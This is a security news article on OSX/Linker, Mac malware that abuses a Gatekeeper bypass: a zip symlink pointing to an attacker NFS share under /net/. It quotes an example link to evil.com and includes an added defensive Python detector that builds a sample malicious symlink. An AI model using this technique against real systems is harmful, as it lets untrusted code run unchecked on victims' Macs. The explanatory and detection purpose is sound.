OSX/Linker Malware Leverages Known Gatekeeper Vulnerability

New Mac malware is being developed targeting a recently discovered macOS Gatekeeper security flaw. The malware in question is known as OSX/Linker, and it has been analyzed by Intego security researcher Joshua Long.

OSX/Linker Malware: what we know so far

The new malware leverages a known Gatekeeper vulnerability which was disclosed in May by Filippo Cavallarin. The bug could allow a malicious binary downloaded from the internet to bypass Gatekeeper’s scanning process. “On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,” the researcher wrote in May upon his discovery.

It’s noteworthy that, by design, Gatekeeper treats both external drives and network shares as safe locations, allowing the apps they contain to run without any check or prompt. However, by putting together two legitimate features of macOS, it is possible to deceive Gatekeeper and its “intended behavior”.

How would an attack based on the vulnerability work? An attacker could craft a zip file containing a symbolic link that points to an attacker-controlled endpoint which macOS automounts (e.g. Documents -> /net/evil.com/Documents) and send it to a targeted system. The user would download the archive and extract the symlink without suspecting anything.


In other words, the technique consists of placing a symlink inside an archive file and pointing it back to a malicious Network File System (NFS) server. The researcher discovered that Gatekeeper would not scan files reached through such a link, so users could execute whatever the symlink pointed to. With a malicious symlink, attackers could therefore run code of their choosing on vulnerable systems.
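As an added illustration (not code from the article or from Intego's research), the following Python snippet shows how a defender could inspect a downloaded zip archive for the pattern described above: a symlink entry whose target lives under a macOS automount path such as /net/ or /Network/. The archive contents and the hostname evil.example are constructed for the demonstration.

```python
import io
import stat
import zipfile
from typing import List, Tuple

# Paths that macOS automounts on access; a symlink into one of these
# pulls content from a remote NFS/SMB share at the time it is opened.
AUTOMOUNT_PREFIXES = ("/net/", "/Network/")


def is_symlink(info: zipfile.ZipInfo) -> bool:
    """Info-ZIP stores the Unix mode in the upper 16 bits of external_attr."""
    mode = info.external_attr >> 16
    return stat.S_ISLNK(mode)


def find_automount_symlinks(data: bytes) -> List[Tuple[str, str]]:
    """Return (entry name, link target) for every symlink aimed at an automount path."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not is_symlink(info):
                continue
            # For symlink entries the stored "file content" is the link target.
            target = zf.read(info).decode("utf-8", "replace")
            if target.startswith(AUTOMOUNT_PREFIXES):
                findings.append((info.filename, target))
    return findings


def build_sample_zip(with_link: bool = True) -> bytes:
    """Constructed sample archive: a harmless file plus, optionally, the suspicious symlink."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "harmless text file")
        if with_link:
            link = zipfile.ZipInfo("Documents")
            link.create_system = 3  # 3 = Unix, so the mode bits are honoured
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            # Hypothetical hostname; the real samples pointed at a live NFS server.
            zf.writestr(link, "/net/evil.example/Documents")
    return buf.getvalue()


if __name__ == "__main__":
    for name, target in find_automount_symlinks(build_sample_zip()):
        print(f"suspicious symlink: {name} -> {target}")
```

A similar check can be applied to the extracted directory tree (os.path.islink / os.readlink) for archives in formats other than zip.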

At the beginning of June, Intego’s malware research team discovered the first known (ab)use of Cavallarin’s vulnerability, which appears to have been a test in preparation for distributing malware.

Although Cavallarin’s vulnerability disclosure specifies a .zip compressed archive, the samples analyzed by Intego were actually disk image files. It seems that malware makers were experimenting to see whether Cavallarin’s vulnerability would work with disk images, too.

The security company observed four samples that were uploaded to VirusTotal on June 6, seemingly within hours of the creation of each disk image. All of them linked to one particular application on an Internet-accessible NFS server.

So far, the researchers’ theory is that the malware maker was “merely conducting some detection testing reconnaissance”. Nonetheless, this is another reminder that malware developers are actively experimenting with new methods to bypass Apple’s built-in protection mechanisms.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum for 4 years. Enjoys ‘Mr. Robot’ and fears ‘1984’. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles!
